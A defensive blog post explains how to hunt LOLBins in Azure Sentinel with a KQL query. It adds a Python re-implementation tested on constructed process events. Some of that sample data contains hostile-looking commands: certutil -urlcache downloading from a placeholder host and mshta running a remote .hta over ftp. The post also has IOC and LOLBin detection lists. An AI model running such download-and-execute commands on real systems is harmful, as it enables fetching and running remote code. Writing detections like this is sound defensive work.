Hunting LOLBins and LOLScripts


LOLBins (Living Off The Land Binaries) are legitimate programs or tools that are commonly used by attackers to gain access to and compromise a system. These programs are often built into an operating system or are widely available as part of a software development kit (SDK) or other application. They are called "Living Off The Land" because they use tools that are already present on the system, rather than introducing new malware or other malicious code.

Attackers use LOLBins because they can be difficult to detect and block, as they are not typically flagged as malicious by antivirus software or other security controls. They can also be used to bypass security controls and gain access to sensitive data or systems, or to execute code on a compromised system. The corresponding MITRE ATT&CK technique is T1218.

To detect and track the use of LOLBins on a system, we can use the Kusto Query Language (KQL). KQL is a powerful query language that is used to analyze data in Azure Sentinel and other data sources.

One way to hunt for LOLBins using KQL is to use a query like the following, which I built:

// Known LOLBin names, pulled from a CSV derived from the LOLBAS Project (header row skipped)
let Bin = externaldata(Binary: string) [@"https://raw.githubusercontent.com/sonnyakhere/LOLBAS_to_CSV/main/lolbas.csv"] with (format="csv", ignoreFirstRecord=true);
// Indicators to look for in the command line
let ioc = dynamic(["http", "ftp"]);
SecurityEvent
| where EventID == 4688
| where TimeGenerated between ( ago(1d) .. now() )
// Looking to exclude system initiated activity
| where SubjectUserName !endswith "$"
| where SubjectUserName != "SYSTEM"
| where ParentProcessName has_any (Bin)
// Looking to only include details of those that have command line activities matching 1 or more of the defined IOCs
| where ProcessCommandLine has_any (ioc)
| project TimeGenerated, SubjectMachineName, SubjectUserName, ParentProcessName, Process, ProcessCommandLine
| sort by TimeGenerated asc

This query begins by using the externaldata operator to retrieve a list of known LOLBins from a CSV file hosted on GitHub. The CSV file was scraped from the popular LOLBAS Project. It then defines a list of indicators of compromise (IOCs) as a dynamic array of strings.

Next, the query filters the SecurityEvent table to include only events with the EventID of 4688, which corresponds to process creation events. It then filters the results to include only events that occurred within the past 24 hours.

The query then uses the where clause to exclude events initiated by the system, by filtering out events with a SubjectUserName that ends with "$" or is equal to "SYSTEM". It also filters the results to include only events where the ParentProcessName has any value that appears in the list of known LOLBins.

Finally, the query filters the results to include only events where the ProcessCommandLine field contains any of the defined IOCs, and projects the resulting events to include the time the event was generated, the subject machine name, the subject user name, the parent process name, the process name, and the process command line. The results are then sorted by the time the event was generated.
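To make the filter pipeline above concrete offline, here is an added Python re-implementation of the same logic run over constructed 4688-style records (example code written for this post, not the author's query or anything from the LOLBAS Project). It assumes a hypothetical four-row LOLBAS CSV, a fixed "now", and approximates KQL's has_any with a case-insensitive whole-term match, which is why a path such as C:\httpd\ does not match the "http" indicator.

```python
import csv, io, re
from datetime import datetime, timedelta, timezone

# Constructed stand-in for the LOLBAS CSV the query pulls via externaldata
# (hypothetical rows; the real file lists one binary name per row).
LOLBAS_CSV = "Binary\nCertutil.exe\nMshta.exe\nRundll32.exe\nBitsadmin.exe\n"
IOC_TERMS = ["http", "ftp"]  # the query's dynamic IOC array
NOW = datetime(2023, 1, 10, 12, 0, tzinfo=timezone.utc)  # fixed "now" for reproducibility

def load_lolbins(csv_text):
    """Lower-cased binary names from a LOLBAS-style CSV, header row skipped."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {row["Binary"].strip().lower() for row in reader if row.get("Binary")}

def has_any_term(text, terms):
    """Approximates KQL has_any: case-insensitive match on whole terms, not substrings."""
    tokens = set(re.findall(r"[a-z0-9]+", text.lower()))
    return any(t.lower() in tokens for t in terms)

def hunt(events, lolbins, now=NOW, lookback=timedelta(days=1)):
    """Apply the query's filters to 4688-style records; return projected hits, oldest first."""
    hits = []
    for ev in events:
        if ev["EventID"] != 4688 or not (now - lookback <= ev["TimeGenerated"] <= now):
            continue
        user = ev["SubjectUserName"]
        if user.endswith("$") or user == "SYSTEM":  # drop machine accounts and SYSTEM
            continue
        parent_image = ev["ParentProcessName"].rsplit("\\", 1)[-1].lower()
        if parent_image not in lolbins or not has_any_term(ev["ProcessCommandLine"], IOC_TERMS):
            continue
        hits.append({k: ev[k] for k in ("TimeGenerated", "SubjectMachineName", "SubjectUserName",
                                        "ParentProcessName", "Process", "ProcessCommandLine")})
    return sorted(hits, key=lambda h: h["TimeGenerated"])

def mk(hours_ago, user, parent, proc, cmd):
    return {"EventID": 4688, "TimeGenerated": NOW - timedelta(hours=hours_ago), "SubjectMachineName": "WS01",
            "SubjectUserName": user, "ParentProcessName": parent, "Process": proc, "ProcessCommandLine": cmd}

SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed: two hits, then one event per exclusion rule
    mk(2, "alice", SYS32 + r"\certutil.exe", "certutil.exe", "certutil.exe -urlcache -f http://files.example.invalid/a.txt a.txt"),
    mk(5, "erin", SYS32 + r"\mshta.exe", "mshta.exe", "mshta.exe ftp://files.example.invalid/run.hta"),
    mk(1, "WS01$", SYS32 + r"\certutil.exe", "certutil.exe", "certutil.exe -urlcache -f http://files.example.invalid/b.txt"),
    mk(1, "bob", r"C:\Windows\explorer.exe", "chrome.exe", "chrome.exe http://intranet.example.invalid"),
    mk(1, "carol", SYS32 + r"\rundll32.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    mk(72, "dave", SYS32 + r"\mshta.exe", "mshta.exe", "mshta.exe http://old.example.invalid/x.hta"),
]
```

Running hunt(SAMPLE_EVENTS, load_lolbins(LOLBAS_CSV)) returns only erin's and alice's events, in that order; the machine-account, non-LOLBin-parent, no-IOC and stale events are dropped by the same rules the KQL applies.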

Conclusion

LOLBins can be difficult to detect and block, as they are not typically flagged as malicious by antivirus software or other security controls.

To detect and track the use of LOLBins on a system, we can use the Kusto Query Language (KQL). The query can also be found on my GitHub. By running this query regularly and monitoring the results, we can stay vigilant against attacks involving LOLBins and take steps to protect our systems.

I hope you found this helpful. Thank you and see you on the next one.